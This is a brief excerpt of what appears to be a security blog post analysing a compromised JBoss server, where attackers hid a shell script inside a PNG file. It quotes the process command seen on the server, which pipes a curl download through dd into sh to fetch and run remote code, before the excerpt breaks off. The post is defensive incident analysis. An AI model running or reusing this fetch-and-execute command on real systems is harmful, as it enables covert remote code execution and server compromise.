Posts Tagged ‘jboss’

Covert channels: Hiding shell scripts in PNG files

A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one:

    sh -c curl hxxp:// -k|dd skip=2446 bs=1|sh

This is a rather elegant way of disguising malicious code. If we first take a look at the png file: […]